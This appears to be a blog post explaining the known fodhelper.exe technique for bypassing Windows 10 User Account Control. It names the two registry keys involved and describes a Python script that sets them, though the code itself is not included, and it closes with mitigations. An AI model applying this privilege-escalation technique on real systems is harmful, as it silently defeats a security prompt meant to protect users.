How to bypass Windows 10 UAC with Python

In May of 2017, discovered a vulnerability in Windows 10 that allows any command to be executed with a high level of privileges without prompting the UAC.

The technique takes advantage of a “trusted binary” called fodhelper.exe to trick its execution.

Windows UAC

User Account Control (UAC) is a security component in Windows operating systems that enables users to perform common tasks as non-administrators and as administrators without having to switch users, log off, or use the option “Run As”.

Every time that a user attempts to perform a task that requires a user administrative access, the consent prompt is presented:

The fodhelper.exe is a “trusted binary” located under C:\Windows\System32. It runs when a user requests to open “Manage Optional Features” option in the “Apps & features” Windows Settings screen.

Windows Settings

The binary contains “auto-elevation” settings in its manifest file, it’s created and digitally signed by Microsoft, and is housed in a trusted file location(C:\Windows\System32). This means that a UAC prompt won’t show when running this binary.

In short, what was found was that during the execution of the fodhelper.exe binary, the OS looks for additional commands to be executed based on two registry keys:

Software\Classes\ms-settings\shell\open\command\(default)
Software\Classes\ms-settings\shell\open\command\DelegateExecute

With that in mind, an attacker could change those registry keys and delegate any kind of code to be executed on the users’ behalf without any consent.

Using Python to Bypass the UAC

Let’s get started writing a simple python script that checks if the user is running the script with administrative privileges:

If you’re NOT running the python script as admin, you’ll get the following message:

[!] The script is NOT running with administrative privileges

Now, let’s change our code to bypass the UAC and run the script again with administrative privileges:

This time, if we run the script, another cmd will be prompted:

The script registered two keys under “Software\Classes\ms-settings\shell\open\command”(check regedit) telling to execute our script every time that the binary fodhelper.exe is executed. Right after we registered the keys, we executed the binary file.

Preventing the Exploitation

To prevent malicious code from being executed utilizing this exploitation, the UAC level can be set to “Always Notify” and a better solution would be that users stop using administrator accounts if they don’t need to (since this technique only works if the user is part of the operating system’s administrator group).

--

--

--

Network Security Engineer, SOC-Siem Engineer, Cyber Security Researcher, Vulnerability Management Specialist | CEH | CNSS

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Managing loss of visibility with the uptick in encrypted traffic

Facebook messenger Video And Audio Calls Will Be Encrypted End-to-End

A Practical Approach to Webmail Forensics Techniques | Lucideus Research

Advanced Ransomware Protection Against the Threat of Ransomware

Coins MarketCap live 24/7

Coins MarketCap live 24/7

Mastering China’s Cybersecurity Regime

What messaging app is best for you?

Meet The UMA Team at ETH Denver

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Süleyman Çelik

Süleyman Çelik

Network Security Engineer, SOC-Siem Engineer, Cyber Security Researcher, Vulnerability Management Specialist | CEH | CNSS

More from Medium

NIKTO THE SCANNING TOOL

Nikto web scanner

The Top 17 Python Libraries for Ethical Hacking with explanation🧵↓

8 Important Questions To Ask Your Cybersecurity Integrator Before Signing

ASCII hacker GIF — at his desk and hacking — cybersecurity concept

How to Find if Your Thumb Drive/SD Card Is Fake With f3 (Linux Tutorial)